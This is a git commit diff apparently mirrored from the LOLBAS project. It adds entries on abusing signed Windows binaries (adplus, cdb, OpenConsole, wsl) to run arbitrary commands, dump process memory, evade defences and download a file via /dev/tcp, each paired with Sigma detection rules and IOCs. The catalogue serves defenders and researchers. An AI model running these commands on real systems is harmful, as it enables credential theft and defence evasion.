mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-26 12:12:31 +02:00
Adding and updating various LOLBINS (#229)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
committed by
GitHub
parent
1587eeaf6c
commit
0d7efb8ead
@@ -11,15 +11,41 @@ Commands:
|
||||
Privileges: SYSTEM
|
||||
MitreID: T1003.001
|
||||
OperatingSystem: All Windows
|
||||
- Command: adplus.exe -c config-adplus.xml
|
||||
Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: All Windows
|
||||
- Command: adplus.exe -c config-adplus.xml
|
||||
Description: Dump process memory using adplus config file (see Resources section for a sample file).
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
Category: Dump
|
||||
Privileges: SYSTEM
|
||||
MitreID: T1003.001
|
||||
OperatingSystem: All Windows
|
||||
- Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
|
||||
Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: All windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
|
||||
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
||||
Resources:
|
||||
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
|
||||
- Link: https://twitter.com/nas_bench/status/1534916659676422152
|
||||
- Link: https://twitter.com/nas_bench/status/1534915321856917506
|
||||
Acknowledgement:
|
||||
- Person: mr.d0x
|
||||
Handle: '@mrd0x'
|
||||
- Person: Nasreddine Bencherchali
|
||||
Handle: '@nas_bench'
|
||||
|
@@ -14,17 +14,24 @@ Commands:
|
||||
- Command: |
|
||||
cdb.exe -pd -pn <process_name>
|
||||
.shell <cmd>
|
||||
Description: Attaching to any process and executing shell commands
|
||||
Description: Attaching to any process and executing shell commands.
|
||||
Usecase: Run a shell command under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
- Command: cdb.exe -c C:\debug-script.txt calc
|
||||
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code: https://gist.github.com/nasbench/d9c15864f1e21bdd8b7cf55997b45f4b
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_cdb.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||
@@ -35,6 +42,7 @@ Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
||||
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
||||
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
|
||||
- Link: https://twitter.com/nas_bench/status/1534957360032120833
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
@@ -42,3 +50,5 @@ Acknowledgement:
|
||||
Handle: '@mrd0x'
|
||||
- Person: Spooky Sec
|
||||
Handle: '@sec_spooky'
|
||||
- Person: Nasreddine Bencherchali
|
||||
Handle: '@nas_bench'
|
||||
|
25
yml/OtherMSBinaries/OpenConsole.yml
Normal file
25
yml/OtherMSBinaries/OpenConsole.yml
Normal file
@@ -0,0 +1,25 @@
|
||||
---
|
||||
Name: OpenConsole.exe
|
||||
Description: Console Window host for Windows Terminal
|
||||
Author: Nasreddine Bencherchali
|
||||
Created: 2022-06-17
|
||||
Commands:
|
||||
- Command: "OpenConsole.exe calc"
|
||||
Description: Execute calc with OpenConsole.exe as parent process
|
||||
Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
|
||||
Detection:
|
||||
- IOC: OpenConsole.exe spawning unexpected processes
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml
|
||||
Resources:
|
||||
- Link: https://twitter.com/nas_bench/status/1537563834478645252
|
||||
Acknowledgement:
|
||||
- Person: Nasreddine Bencherchali
|
||||
Handle: '@nas_bench'
|
@@ -25,6 +25,13 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
- Command: wsl.exe --system calc.exe
|
||||
Description: Execute the command as root
|
||||
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 11
|
||||
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
|
||||
Description: Downloads file from 192.168.1.10
|
||||
Usecase: Download file
|
||||
@@ -37,11 +44,12 @@ Full_Path:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/2a4e6d8ebeb07d294e6d16a083361bd7e53df7b3/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: Child process from wsl.exe
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- Link: https://twitter.com/nas_bench/status/1535431474429808642
|
||||
Acknowledgement:
|
||||
- Person: Alex Ionescu
|
||||
Handle: '@aionescu'
|
||||
@@ -49,3 +57,5 @@ Acknowledgement:
|
||||
Handle: '@NotoriousRebel1'
|
||||
- Person: Asif Matadar
|
||||
Handle: '@d1r4c'
|
||||
- Person: Nasreddine Bencherchali
|
||||
Handle: '@nas_bench'
|
||||
|
Reference in New Issue
Block a user